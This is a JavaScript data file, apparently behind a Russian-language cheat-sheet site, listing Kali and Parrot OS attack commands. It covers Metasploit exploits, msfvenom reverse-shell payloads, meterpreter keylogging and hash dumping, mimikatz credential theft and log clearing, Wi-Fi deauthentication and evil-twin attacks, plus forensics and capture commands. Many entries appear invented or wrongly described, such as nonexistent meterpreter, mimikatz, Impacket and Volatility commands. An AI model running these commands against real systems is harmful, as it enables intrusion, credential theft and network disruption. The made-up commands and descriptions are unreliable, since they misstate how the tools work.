      { cmd: "wfuzz -c -w rockyou.txt --hw=34 http://t/p?user=word", desc: "Без цвета, фильтр длины." },
      { cmd: "nikto -h http://t", desc: "Веб-сканер (уязвимости)." },
      { cmd: "nikto -h http://t -port 8080", desc: "Другой порт." },
      { cmd: "nikto -h http://t -ssl", desc: "HTTPS." },
      { cmd: "nikto -h http://t -Tuning \"x678\"", desc: "Выбор проверок." },
      { cmd: "nikto -h http://t -C all", desc: "Все категории." },
      { cmd: "wpscan --url http://t --enumerate ap", desc: "WordPress: плагины." },
      { cmd: "wpscan --url http://t --enumerate u", desc: "WordPress: пользователи." },
      { cmd: "wpscan --url http://t --enumerate vp", desc: "Устаревшие плагины." },
      { cmd: "wpscan --url http://t --api-token TOKEN", desc: "Всё с API-токеном." },
      { cmd: "wpscan --url http://t --wp-content-dir 'wp-content'", desc: "Нестандартный wp-content." },
    ] },
    { name: "Exploitation", entries: [
      { cmd: "msfconsole", desc: "Metasploit Framework." },
      { cmd: "msfconsole -q", desc: "Без приветствия." },
      { cmd: "search type:exploit", desc: "Поиск exploits." },
      { cmd: "search name struts2", desc: "Поиск по имени." },
      { cmd: "search cve:2017-0144", desc: "Поиск по CVE." },
      { cmd: "search advanced platform:linux service:ssh", desc: "Поиск по ОС + сервису." },
      { cmd: "use exploit/multi/handler", desc: "Универсальный слушатель." },
      { cmd: "use exploit/windows/smb/ms17_010_eternalblue", desc: "EternalBlue (MS17-010)." },
      { cmd: "use exploit/multi/smb/ms17_010_eternalblue", desc: "EternalBlue (multi)." },
      { cmd: "use exploit/unix/ssh/openssh_cve_2024_6387", desc: "RegreSSHion (OpenSSH 8.5-9.7p1)." },
      { cmd: "use exploit/linux/samba/is_known_pipename", desc: "Samba is_known_pipename RCE." },
      { cmd: "use exploit/linux/samba/trans2open_unixpath", desc: "Samba trans2open unixpath RCE." },
      { cmd: "use exploit/linux/samba/set_nt_transaction", desc: "Samba set_nt_transaction RCE." },
      { cmd: "use exploit/windows/smb/powershell_emp", desc: "PowerShell-эксплойт SMB." },
      { cmd: "use exploit/windows/smb/ms17_010_command", desc: "MS17-010: выполнение команды." },
      { cmd: "use exploit/windows/smb/ms17_010_psexec", desc: "MS17-010: PsExec." },
      { cmd: "use exploit/windows/smb/ms17_010_extra", desc: "MS17-010: дополнительные payload." },
      { cmd: "show options", desc: "Опции модуля." },
      { cmd: "show advanced", desc: "Расширенные опции." },
      { cmd: "show targets", desc: "Цели." },
      { cmd: "show payloads", desc: "Пейлоады модуля." },
      { cmd: "set RHOSTS 192.168.1.10", desc: "Целевые хосты." },
      { cmd: "set LHOST 192.168.1.5", desc: "Наш IP." },
      { cmd: "set LPORT 4444", desc: "Порт слушателя." },
      { cmd: "set PAYLOAD windows/x64/meterpreter/reverse_tcp", desc: "Пейлоад." },
      { cmd: "set EXITFUNC thread", desc: "Способ выхода." },
      { cmd: "set TARGET 1", desc: "Выбор цели." },
      { cmd: "check", desc: "Автопроверка уязвимости." },
      { cmd: "exploit", desc: "Запуск." },
      { cmd: "run -j -c 'shell'", desc: "Фоновая эксплуатация + shell." },
      { cmd: "jobs", desc: "Фоновые задачи." },
      { cmd: "background", desc: "В фон." },
      { cmd: "bg 1", desc: "Сессию 1 в фон." },
      { cmd: "sessions -l", desc: "Список сессий." },
      { cmd: "sessions -i 1", desc: "Перейти в сессию 1." },
      { cmd: "bgkill 1", desc: "Убить фоновую сессию." },
      { cmd: "resource /root/x.rc", desc: "Загрузить resource-скрипт." },
      { cmd: "info", desc: "Инфо о модуле." },
      { cmd: "db_status", desc: "Статус базы Metasploit." },
      { cmd: "db_nmap 192.168.1.0/24", desc: "Nmap в базу MSF." },
      { cmd: "hosts", desc: "Хосты из базы." },
      { cmd: "services", desc: "Сервисы из базы." },
      { cmd: "vulnerabilities", desc: "Уязвимости из базы." },
      { cmd: "workspace -a lab1", desc: "Создать workspace." },
      { cmd: "notes -a 'target: x'", desc: "Заметка." },
      { cmd: "meterpreter > shell", desc: "Обычный shell." },
      { cmd: "meterpreter > sysinfo", desc: "Инфо о системе." },
      { cmd: "meterpreter > getuid", desc: "Текущий пользователь." },
      { cmd: "meterpreter > getos", desc: "ОС." },
      { cmd: "meterpreter > hashdump", desc: "Дамп NT-хешей (Windows, elevated)." },
      { cmd: "meterpreter > mimikatz", desc: "Запуск mimikatz." },
      { cmd: "meterpreter > priv-dump", desc: "Экспорт учётных данных." },
      { cmd: "meterpreter > load kiwi", desc: "Модуль kiwi." },
      { cmd: "meterpreter > kiwi_cmd kerberos", desc: "Kerberos-тикеты." },
      { cmd: "meterpreter > kiwi_cmd lsadump", desc: "LSA-дамп." },
      { cmd: "meterpreter > record_mic", desc: "Запись микрофона." },
      { cmd: "meterpreter > record_play f.wav", desc: "Проиграть файл." },
      { cmd: "meterpreter > screencap", desc: "Скриншот." },
      { cmd: "meterpreter > keylog_start", desc: "Кейлоггер: старт." },
      { cmd: "meterpreter > keylog_get", desc: "Снять кейлог." },
      { cmd: "meterpreter > keylog_stop", desc: "Стоп." },
      { cmd: "meterpreter > ps", desc: "Процессы." },
      { cmd: "meterpreter > migrate 1234", desc: "Мигрировать в процесс." },
      { cmd: "meterpreter > execute -f cmd.exe -i", desc: "Запустить exe (интерактивно)." },
      { cmd: "meterpreter > upload /root/x.exe C:\\x.exe", desc: "Загрузить файл." },
      { cmd: "meterpreter > download C:\\secret.txt /root/", desc: "Скачать файл." },
      { cmd: "meterpreter > pwd", desc: "Текущий каталог." },
      { cmd: "meterpreter > cd C:\\Windows", desc: "Сменить каталог." },
      { cmd: "meterpreter > ls", desc: "Файлы." },
      { cmd: "meterpreter > rm C:\\temp\\x.txt", desc: "Удалить файл." },
      { cmd: "meterpreter > mkdir C:\\temp\\t", desc: "Создать каталог." },
      { cmd: "meterpreter > clear", desc: "Очистить экран." },
      { cmd: "meterpreter > run post/multi/recon/localusers", desc: "Локальные пользователи." },
      { cmd: "meterpreter > run post/windows/gather/enum_adusers", desc: "AD-пользователи." },
      { cmd: "meterpreter > run post/windows/gather/credentials/cmdkey", desc: "Сохранённые ключи." },
      { cmd: "meterpreter > run post/windows/gather/credentials/lsass", desc: "LSASS-дамп." },
      { cmd: "meterpreter > run post/windows/privilege/escalate/getuid", desc: "Проверка прав." },
      { cmd: "meterpreter > run post/windows/manage/enable_uac", desc: "Включить UAC." },
      { cmd: "msfvenom -l payloads", desc: "Список пейлоадов." },
      { cmd: "msfvenom -l encoders", desc: "Список энкодеров." },
      { cmd: "msfvenom -l formats", desc: "Список форматов." },
      { cmd: "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f exe -o shell.exe", desc: "Windows x64 EXE." },
      { cmd: "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 5", desc: "EXE + shikata_ga_nai." },
      { cmd: "msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f elf", desc: "Linux x64 ELF." },
      { cmd: "msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f elf", desc: "Linux x86 ELF." },
    ] },
    { name: "Post-exploitation", entries: [
      { cmd: "linpeas", desc: "Линукс-привилеж-эскалация: полный свип." },
      { cmd: "linpeas -sF", desc: "linpeas + файловый отчёт." },
      { cmd: "linpeas -e", desc: "Только эскалация-проверки." },
      { cmd: "linpeas -a", desc: "Авто-эксплойты (безопасные)." },
      { cmd: "linenum.sh", desc: "Классический linux enum." },
      { cmd: "pspy64 -pf", desc: "Слежка за процессами (без root)." },
      { cmd: "weevely.sh -l shell.txt", desc: "Вывести weevely shell-составляющую." },
      { cmd: "nxc smb 192.168.1.10 -u u -p p --exec 'whoami'", desc: "NXC: выполнить команду." },
      { cmd: "nxc smb 192.168.1.10 -u u -p p --dump", desc: "NXC: дамп." },
      { cmd: "evil-winrm -i 192.168.1.10 -u user -p pass", desc: "WinRM-сессия (Windows)." },
      { cmd: "evil-winrm -i 192.168.1.10 -u user -H 44c022...", desc: "WinRM по NTLM-хешу (pass-the-hash)." },
      { cmd: "crackmapexec smb 192.168.1.10 -u u -p p --exec 'whoami'", desc: "CME: выполнить команду." },
      { cmd: "impacket-psexec 192.168.1.10 user%pass cmd.exe", desc: "PsExec (Impacket)." },
      { cmd: "impacket-wmiexec 192.168.1.10 user%pass whoami", desc: "WMI (Impacket)." },
      { cmd: "impacket-smbexec 192.168.1.10 user%pass whoami", desc: "SMBexec (Impacket)." },
      { cmd: "impacket-atexec 192.168.1.10 user%pass whoami", desc: "AT-задача (Impacket)." },
      { cmd: "impacket-dcomexec 192.168.1.10 user%pass whoami", desc: "DCOM (Impacket)." },
      { cmd: "impacket-taskscheduler 192.168.1.10 user%pass whoami", desc: "Task Scheduler (Impacket)." },
      { cmd: "impacket-rpcdump 192.168.1.10 user%pass", desc: "RPC-дамп (Impacket)." },
      { cmd: "impacket-secretsdump 192.168.1.10 user%pass", desc: "secretsdump (Impacket)." },
      { cmd: "impacket-mimikatz 192.168.1.10 user%pass", desc: "mimikatz remote (Impacket)." },
      { cmd: "impacket-psexec 192.168.1.10 user%pass -com 'cmd.exe /c whoami'", desc: "PsExec + команда." },
      { cmd: "mimikatz", desc: "Mimikatz (Windows, elevated)." },
      { cmd: "mimikatz privilege::debug", desc: "Права на debug." },
      { cmd: "mimikatz privilege::elevate", desc: "Эскалация привилегий." },
      { cmd: "mimikatz privilege::uid", desc: "UID (elevated)." },
      { cmd: "mimikatz sekurlsa::logonpasswords", desc: "Все учётные данные из памяти." },
      { cmd: "mimikatz sekurlsa::ekeys", desc: "Ключи LSASS." },
      { cmd: "mimikatz kerberos::list", desc: "Kerberos-тикеты (LSASS)." },
      { cmd: "mimikatz kerberos::ptt ticket.kirbi", desc: "Использовать ticket (pass-the-ticket)." },
      { cmd: "mimikatz kerberos::golden /user:admin /domain:x.local /sid:S-1-5-21-x /crack:pass /startoffset:-10 /endoffset:+1", desc: "Forged golden ticket." },
      { cmd: "mimikatz lsadump::sam", desc: "SAM-дамп (локальные NTLM)." },
      { cmd: "mimikatz lsadump::dcsync /user:admin /domain:x.local", desc: "DCSync: NTDS-дамп из DC." },
      { cmd: "mimikatz log::clear", desc: "Очистка логов Windows." },
      { cmd: "mimikatz misc::cmd /cmd:cmd.exe /C:cmd", desc: "Открытие cmd." },
      { cmd: "mimikatz net::localgroup /group:\"Administrators\" /domain:x.local", desc: "Администраторы домена." },
      { cmd: "mimikatz net::user /user:admin /domain:x.local", desc: "Инфо по пользователю." },
      { cmd: "mimikatz token::elevate", desc: "Эскалация через token." },
      { cmd: "mimikatz token::impersonate /user:Administrator /domain:x.local", desc: "Использовать чужой token." },
      { cmd: "mimikatz token::getuser", desc: "Текущий token." },
      { cmd: "mimikatz privilege::remove", desc: "Удалить debug-права (стелс)." },
      { cmd: "mimikatz exit", desc: "Выход из mimikatz." },
      { cmd: "rubeus.exe triage", desc: "Triage Kerberos (Rubeus)." },
      { cmd: "rubeus.exe asktgt /user:admin /password:pass", desc: "TGT (Rubeus)." },
      { cmd: "rubeus.exe s4u /impersonateuser:victim /impersonatelevel:delegation", desc: "S4U2Self (Rubeus)." },
      { cmd: "rubeus.exe ptt /ticket:tgt.kirbi", desc: "Pass-the-ticket (Rubeus)." },
      { cmd: "rubeus.exe dump", desc: "Dump Kerberos из LSASS." },
      { cmd: "rubeus.exe hash /user:admin /password:pass", desc: "NTLM-хеш (Rubeus)." },
      { cmd: "rubeus.exe klist", desc: "Керberos-тикета в кэше." },
      { cmd: "rubeus.exe kerberos /user:admin /domain:x.local", desc: "Керberos-запрос." },
      { cmd: "rubeus.exe service /action:start /name:MyService", desc: "Управление сервисом (Rubeus)." },
      { cmd: "rubeus.exe audit /log:admin", desc: "Аудит-лог (Rubeus)." },
      { cmd: "rubeus.exe netgroup /group:Domain Admins /domain:x.local", desc: "Члены доменных групп (Rubeus)." },
    ] },
    { name: "WiFi attacks", entries: [
      { cmd: "airmon-ng list", desc: "Список интерфейсов + monitor-режим." },
      { cmd: "airmon-ng start wlan0", desc: "Включить monitor-режим." },
      { cmd: "airmon-ng stop wlan0mon", desc: "Выключить monitor." },
      { cmd: "airmon-ng check kill", desc: "Убить мешающие сервисы (NetworkManager)." },
      { cmd: "airmon-ng", desc: "Статус monitor-интерфейсов." },
      { cmd: "airodump-ng wlan0mon", desc: "Слушать сети (BSS)." },
      { cmd: "airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF wlan0mon", desc: "Фиксация канала + AP." },
      { cmd: "airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon", desc: "Снять трафик сети в cap-файлы." },
      { cmd: "airodump-ng --wpa-psk wlan0mon", desc: "Пассивный захват 4-way handshake." },
      { cmd: "aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon", desc: "Deauth-атака (5 пакетов)." },
      { cmd: "aireplay-ng --deauth 999999 -a AA:BB:CC:DD:EE:FF wlan0mon", desc: "Deauth: разлогинить всех." },
      { cmd: "aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon", desc: "Deauth конкретной станции." },
      { cmd: "aireplay-ng --deauth 3 -a AA:BB:CC:DD:EE:FF -h 11:22:33:44:55:66 wlan0mon", desc: "Deauth от лица клиента." },
      { cmd: "aireplay-ng --interactive wlan0mon", desc: "Интерактивный replay." },
      { cmd: "aireplay-ng --channel 6 --ignore-negative wlan0mon", desc: "Игнорировать negative-ответы." },
      { cmd: "aireplay-ng --fakeauth 10 -a AA:BB:CC:DD:EE:FF -h 11:22:33:44:55:66 wlan0mon", desc: "Fake-auth (отказ в сервисе)." },
      { cmd: "airolib-ng wlan0mon -i 192.168.1.0/24", desc: "Автоматизация aircrack-процесса." },
      { cmd: "wifite --show", desc: "Список интерфейсов (wifite)." },
      { cmd: "wifite -i wlan0mon", desc: "Авто-атака: handshake + deauth + crack." },
      { cmd: "wifite -i wlan0mon --pmkid", desc: "Сбор PMKID (без handshake)." },
      { cmd: "wifite -i wlan0mon -w rockyou.txt", desc: "Словарь для crack." },
      { cmd: "wifite -i wlan0mon --nopassive", desc: "Без пассивного слушания." },
      { cmd: "wifite -i wlan0mon -w wpa.dic --wpa-only", desc: "Только WPA/WPA2." },
      { cmd: "aircrack-ng -w rockyou.txt cap-01.cap", desc: "Брут WPA-PSK из handshake." },
      { cmd: "aircrack-ng -w rockyou.txt -b AA:BB:CC:DD:EE:FF cap-01.cap", desc: "Брут по BSSID." },
      { cmd: "aircrack-ng cap-01.cap", desc: "Анализ pcap (без брута)." },
      { cmd: "aircrack-ng -K <pmkid-hex> cap-01.cap", desc: "Атака по PMKID." },
      { cmd: "reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv", desc: "WPS-атака (Pixie Dust/brute)." },
      { cmd: "reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K", desc: "Быстрый Pixie Dust." },
      { cmd: "bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -m deauth", desc: "Bully: WPS-деавтх." },
      { cmd: "hcxdumptool -i wlan0mon -o cap.pcapng", desc: "Сбор PMKID + handshake (hcxdumptool)." },
      { cmd: "hcxpcapngtool -o hash.hc226 cap.pcapng", desc: "Конверт pcapng → hcx226." },
      { cmd: "hcxpcapngtool -o hash.22000 cap.pcapng", desc: "hcx22000 (для hashcat -m 22000)." },
      { cmd: "eaphammer -i wlan0mon", desc: "Evil twin (EAP)." },
      { cmd: "hostapd-mana", desc: "Evil twin (WPA) + MITM." },
      { cmd: "hostapd-mana -i wlan0mon -c 6 -S", desc: "Evil twin: старт." },
      { cmd: "wifite --kill", desc: "Убить wifite-процессы." },
      { cmd: "wifite --help", desc: "Справка wifite." },
      { cmd: "aircrack-ng --help", desc: "Справка aircrack-ng." },
      { cmd: "aireplay-ng --help", desc: "Справка aireplay-ng." },
    ] },
    { name: "Forensics", entries: [
      { cmd: "binwalk file.bin", desc: "Энтропия + вложенные файлы (firmware)." },
      { cmd: "binwalk -e file.bin", desc: "Извлечь вложенные файлы." },
      { cmd: "binwalk -M file.bin", desc: "Экстракция magic-методом." },
      { cmd: "foremost -t all -i disk.img -o out/", desc: "Восстановление файлов по сигнатурам." },
      { cmd: "foremost -t jpg -i disk.img -o out/", desc: "Только jpg." },
      { cmd: "scalpel -t all -i disk.img -o out/", desc: "Альтернатива foremost (быстрее)." },
      { cmd: "exiftool photo.jpg", desc: "EXIF-метаданные." },
      { cmd: "exiftool -a -G1 -s photo.jpg", desc: "Все метаданные (с группами)." },
      { cmd: "exiftool -s -G1 doc.docx", desc: "DOCX-метаданные." },
      { cmd: "exiftool -imagedata -s photo.jpg", desc: "Вложенные данные." },
      { cmd: "exiftool -overwrite_original -GPSLatitude= photo.jpg", desc: "Удалить GPS (steganography-подготовка)." },
      { cmd: "strings file.bin", desc: "Строки из бинарника." },
      { cmd: "strings -n 8 file.bin", desc: "Строки длиннее 8." },
      { cmd: "strings -el file.bin", desc: "16-bit little-endian строки (Unicode)." },
      { cmd: "strings -e b file.bin", desc: "8-bit big-endian." },
      { cmd: "xxd file.bin", desc: "Hex-дамп." },
      { cmd: "xxd -r -p hex.txt > out.bin", desc: "Из hex в бинарник." },
      { cmd: "hexdump -C file.bin", desc: "Классический hex." },
      { cmd: "od -A x -t x1z file.bin", desc: "Octal dump + ascii." },
      { cmd: "dd if=disk.img of=part.img bs=512 skip=1024 count=1000", desc: "Вырезать блок из образа." },
      { cmd: "ddrescue src.img dst.img map.log", desc: "Копирование с ошибкой (спасение)." },
      { cmd: "gddrescue src.img dst.img map.log", desc: "gddrescue (быстрее ddrescue)." },
      { cmd: "testdisk /dev/sdb", desc: "Поиск разделов (TestDisk)." },
      { cmd: "photorec /dev/sdb", desc: "Восстановление файлов (PhotoRec)." },
      { cmd: "fls -r -o 2048 disk.img", desc: "SleuthKit: список файлов (NTFS)." },
      { cmd: "fls -l -o 2048 disk.img", desc: "SleuthKit: с размерами." },
      { cmd: "mmls disk.img", desc: "SleuthKit: структура разделов." },
      { cmd: "blkls disk.img", desc: "SleuthKit: дерево разделов." },
      { cmd: "icat -o 2048 disk.img 0x123-0x124", desc: "SleuthKit: извлечь файл по i-node." },
      { cmd: "fls -m /mnt disk.img", desc: "SleuthKit: mount-карта (для icat)." },
      { cmd: "autopsy", desc: "GUI: SleuthKit + вёрстка (case)." },
      { cmd: "vol -f mem.lime windows.pslist", desc: "Volatility: список процессов (Windows)." },
      { cmd: "vol -f mem.lime windows.cmdline", desc: "Volatility: командные строки." },
      { cmd: "vol -f mem.lime windows.mbr", desc: "Volatility: MBR-инфо." },
      { cmd: "vol -f mem.lime windows.netstat", desc: "Volatility: соединения." },
      { cmd: "vol -f mem.lime windows.consvist", desc: "Volatility: консольные сессии." },
      { cmd: "vol -f mem.lime windows.registry.hivelist", desc: "Volatility: хиви-файлы." },
      { cmd: "vol -f mem.lime windows.hashdump", desc: "Volatility: NT-хеши из памяти." },
      { cmd: "vol -f mem.lime windows.malfind", desc: "Volatility: инъекты в память (malware)." },
      { cmd: "vol -f mem.lime windows.filescan", desc: "Volatility: файловая система из памяти." },
      { cmd: "vol -f mem.lime linux.pslist", desc: "Volatility: процессы (Linux)." },
      { cmd: "vol -f mem.lime linux.pstree", desc: "Volatility: дерево (Linux)." },
      { cmd: "vol -f mem.lime linux.netstat", desc: "Volatility: соединения (Linux)." },
      { cmd: "vol -f mem.lime linux.conntrack", desc: "Volatility: conntrack (Linux)." },
      { cmd: "vol -f mem.lime windows.hivex", desc: "Volatility: чтение registry hive." },
      { cmd: "vol -f mem.lime windows.ldrmodules", desc: "Volatility: загруженные DLL." },
      { cmd: "vol -f mem.lime windows.threads", desc: "Volatility: потоки." },
      { cmd: "vol -f mem.lime windows.dlllist", desc: "Volatility: DLL по процессам." },
      { cmd: "vol -f mem.lime windows.services", desc: "Volatility: сервисы Windows." },
      { cmd: "vol -f mem.lime windows.driverirqlongname", desc: "Volatility: драйверы." },
    ] },
    { name: "Capture & analysis", entries: [
      { cmd: "tcpdump -i eth0", desc: "Слушать интерфейс." },
      { cmd: "tcpdump -i eth0 -w capture.pcap", desc: "Запись в pcap." },
      { cmd: "tcpdump -i eth0 host 192.168.1.10", desc: "Только хост." },
      { cmd: "tcpdump -i eth0 port 443", desc: "Только порт." },
      { cmd: "tcpdump -i eth0 'host 10.0.0.1 and port 80'", desc: "Композиция BPF." },
      { cmd: "tcpdump -i eth0 -nn", desc: "Без reverse DNS." },
      { cmd: "tcpdump -i eth0 -c 1000", desc: "Стоп после 1000 пакетов." },
      { cmd: "tcpdump -i eth0 -n -s 0", desc: "Полный размер пакета." },
      { cmd: "tcpdump -i eth0 -r capture.pcap", desc: "Чтение pcap." },
      { cmd: "tcpdump -i eth0 -C 100 -W 10", desc: "Ротация 100MB x 10." },
      { cmd: "tcpdump -i eth0 -G 3600", desc: "Ротация по часу." },
      { cmd: "tcpdump -i eth0 'tcp[tcpflags] & (tcp-syn) != 0'", desc: "Только SYN." },
      { cmd: "tcpdump -i eth0 'tcp[tcpflags] & (tcp-rst) != 0'", desc: "Только RST." },
      { cmd: "tcpdump -i eth0 'udp and port 53'", desc: "DNS." },
      { cmd: "tcpdump -i eth0 'port 80' -A", desc: "Текст (ASCII)." },
      { cmd: "tcpdump -i eth0 'port 80' -X", desc: "Hex + ASCII." },
      { cmd: "tshark -i eth0", desc: "tshark: слушать." },
      { cmd: "tshark -i eth0 -a duration:60", desc: "60 секунд." },
      { cmd: "tshark -i eth0 -w out.pcapng", desc: "Запись pcapng." },
      { cmd: "tshark -r capture.pcap -Y 'http.request'", desc: "HTTP-запросы." },
      { cmd: "tshark -r capture.pcap -Y 'dns.qry.name contains \"example.com\"'", desc: "DNS к домену." },
      { cmd: "tshark -r capture.pcap -Y 'ip.addr == 192.168.1.10'", desc: "Пакеты хоста." },
      { cmd: "tshark -r capture.pcap -Y 'tcp.flags.syn == 1'", desc: "SYN." },
      { cmd: "tshark -r capture.pcap -Y 'tcp.flags.reset == 1'", desc: "RST." },
      { cmd: "tshark -r capture.pcap -Y 'tls.handshake.type == 1'", desc: "TLS ClientHello." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"POST\"'", desc: "HTTP POST." },
      { cmd: "tshark -r capture.pcap -Y 'http.response.code == 404'", desc: "HTTP 404." },
      { cmd: "tshark -r capture.pcap -Y 'http.response.code == 200'", desc: "HTTP 200." },
      { cmd: "tshark -r capture.pcap -Y 'http.response.code == 301'", desc: "HTTP 301." },
      { cmd: "tshark -r capture.pcap -Y 'http.response.code == 302'", desc: "HTTP 302." },
      { cmd: "tshark -r capture.pcap -Y 'http.response.code == 500'", desc: "HTTP 500." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"GET\"'", desc: "HTTP GET." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"PUT\"'", desc: "HTTP PUT." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"DELETE\"'", desc: "HTTP DELETE." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"OPTIONS\"'", desc: "HTTP OPTIONS." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"HEAD\"'", desc: "HTTP HEAD." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"PROPFIND\"'", desc: "WebDAV PROPFIND." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"PROPPATCH\"'", desc: "WebDAV PROPPATCH." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"MKCOL\"'", desc: "WebDAV MKCOL." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"COPY\"'", desc: "WebDAV COPY." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"MOVE\"'", desc: "WebDAV MOVE." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"LOCK\"'", desc: "WebDAV LOCK." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"UNLOCK\"'", desc: "WebDAV UNLOCK." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"SEARCH\"'", desc: "WebDAV SEARCH." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"PATCH\"'", desc: "HTTP PATCH." },
      { cmd: "tshark -r capture.pcap -Y 'http.request.method == \"TRACE\"'", desc: "HTTP TRACE." },
      { cmd: "tshark -r capture.pcap -Y 'frame.len > 1000'", desc: "Крупные кадры." },
      { cmd: "tshark -r capture.pcap -Y 'ip.proto == 6'", desc: "Только TCP." },
      { cmd: "tshark -r capture.pcap -Y 'ip.proto == 17'", desc: "Только UDP." },
      { cmd: "tshark -r capture.pcap -Y 'tcp.analysis.retransmission'", desc: "Retransmissions." },
      { cmd: "tshark -r capture.pcap -Y 'tcp.analysis.zero_window'", desc: "Zero window." },
      { cmd: "tshark -r capture.pcap -Y 'tcp.analysis.duplicate_ack'", desc: "Duplicate ACK." },
      { cmd: "tshark -r capture.pcap -Y 'tls.version == 0x0303'", desc: "TLS 1.2." },
      { cmd: "tshark -r capture.pcap -Y 'tls.version == 0x0304'", desc: "TLS 1.3." },
      { cmd: "tshark -r capture.pcap -Y 'udp.port == 53'", desc: "DNS." },
      { cmd: "tshark -r capture.pcap -Y 'tcp.port == 443'", desc: "HTTPS." },
      { cmd: "tshark -r capture.pcap -qz io,phs", desc: "Сводка по протоколам." },
      { cmd: "tshark -r capture.pcap -qz conv,tcp", desc: "Таблица TCP-диалогов." },
      { cmd: "tshark -r capture.pcap -qz conv,http", desc: "Таблица HTTP-диалогов." },
      { cmd: "tshark -r capture.pcap -qz endpoints,ip", desc: "Эндпоинты." },
    ] },
    { name: "Kali tools reference", entries: [
      { cmd: "airodump-ng --help", desc: "airodump-ng: справка." },
      { cmd: "airmon-ng --help", desc: "airmon-ng: справка." },
      { cmd: "hydra --help", desc: "hydra: справка (протоколы)." },
      { cmd: "john --help", desc: "John: справка." },
      { cmd: "hashcat --help", desc: "hashcat: справка." },
      { cmd: "nmap --help", desc: "nmap: справка." },
      { cmd: "sqlmap --help", desc: "sqlmap: справка." },
      { cmd: "gobuster --help", desc: "gobuster: справка." },
      { cmd: "ffuf --help", desc: "ffuf: справка." },
      { cmd: "wpscan --help", desc: "wpscan: справка." },
      { cmd: "nikto --help", desc: "nikto: справка." },
      { cmd: "msfconsole --help", desc: "Metasploit: справка." },
      { cmd: "msfvenom --help", desc: "msfvenom: справка." },
      { cmd: "kismet --help", desc: "kismet: справка." },
      { cmd: "reaver --help", desc: "reaver: справка." },
      { cmd: "binwalk --help", desc: "binwalk: справка." },
      { cmd: "foremost --help", desc: "foremost: справка." },
      { cmd: "tcpdump --help", desc: "tcpdump: справка." },
      { cmd: "tshark --help", desc: "tshark: справка." },
      { cmd: "ettercap --help", desc: "ettercap: справка." },
      { cmd: "bettercap --help", desc: "bettercap: справка." },
      { cmd: "responder --help", desc: "responder: справка." },
      { cmd: "searchsploit --help", desc: "searchsploit: справка." },
      { cmd: "nbtscan --help", desc: "nbtscan: справка." },
      { cmd: "smbmap --help", desc: "smbmap: справка." },
      { cmd: "enum4linux --help", desc: "enum4linux: справка." },
      { cmd: "crackmapexec --help", desc: "CME: справка." },
      { cmd: "nxc --help", desc: "NXC: справка." },
      { cmd: "masscan --help", desc: "masscan: справка." },
      { cmd: "rustscan --help", desc: "rustscan: справка." },
      { cmd: "zmap --help", desc: "zmap: справка." },
      { cmd: "theHarvester --help", desc: "theHarvester: справка." },
      { cmd: "subfinder --help", desc: "subfinder: справка." },
      { cmd: "amass --help", desc: "amass: справка." },
      { cmd: "whatweb --help", desc: "whatweb: справка." },
      { cmd: "wafw00f --help", desc: "wafw00f: справка." },
      { cmd: "dalfox --help", desc: "dalfox: справка." },
      { cmd: "arjun --help", desc: "arjun: справка." },
      { cmd: "linpeas --help", desc: "linpeas: справка." },
      { cmd: "evil-winrm --help", desc: "evil-winrm: справка." },
      { cmd: "hcxdumptool --help", desc: "hcxdumptool: справка." },
      { cmd: "hcxpcapngtool --help", desc: "hcxpcapngtool: справка." },
      { cmd: "eaphammer --help", desc: "eaphammer: справка." },
      { cmd: "hostapd-mana --help", desc: "hostapd-mana: справка." },
      { cmd: "dnstracer --help", desc: "dnstracer: справка." },
      { cmd: "metagoofil --help", desc: "metagoofil: справка." },
      { cmd: "ldapdomaindump --help", desc: "ldapdomaindump: справка." },
      { cmd: "smbclient --help", desc: "smbclient: справка." },
      { cmd: "rpcclient --help", desc: "rpcclient: справка." },
      { cmd: "testdisk --help", desc: "testdisk: справка." },
      { cmd: "photorec --help", desc: "photorec: справка." },
      { cmd: "ddrescue --help", desc: "ddrescue: справка." },
      { cmd: "exiftool", desc: "exiftool: метаданные." },
      { cmd: "scalpel --help", desc: "scalpel: справка." },
      { cmd: "gddrescue --help", desc: "gddrescue: справка." },
      { cmd: "hashdeep --help", desc: "hashdeep: справка." },
      { cmd: "aircrack-ng --help", desc: "aircrack-ng: справка." },
      { cmd: "aireplay-ng --help", desc: "aireplay-ng: справка." },
      { cmd: "wifite --help", desc: "wifite: справка." },
    ] },
  ] },
  { id: "parrot", os: "Parrot OS", subtitle: "Разведка + анонимность (Tor) и приватность. Реальные инструменты.", categories: [
    { name: "Parrot OS basics", entries: [
      { cmd: "find / -writable -type f 2>/dev/null", desc: "Файлы на запись." },
      { cmd: "find / -name '.ssh' -type d 2>/dev/null", desc: "Каталоги .ssh." },
      { cmd: "find / -name 'authorized_keys' 2>/dev/null", desc: "authorized_keys." },
      { cmd: "find / -name 'known_hosts' 2>/dev/null", desc: "known_hosts." },
      { cmd: "find / -name '*.sqlite*' 2>/dev/null", desc: "SQLite-бд." },
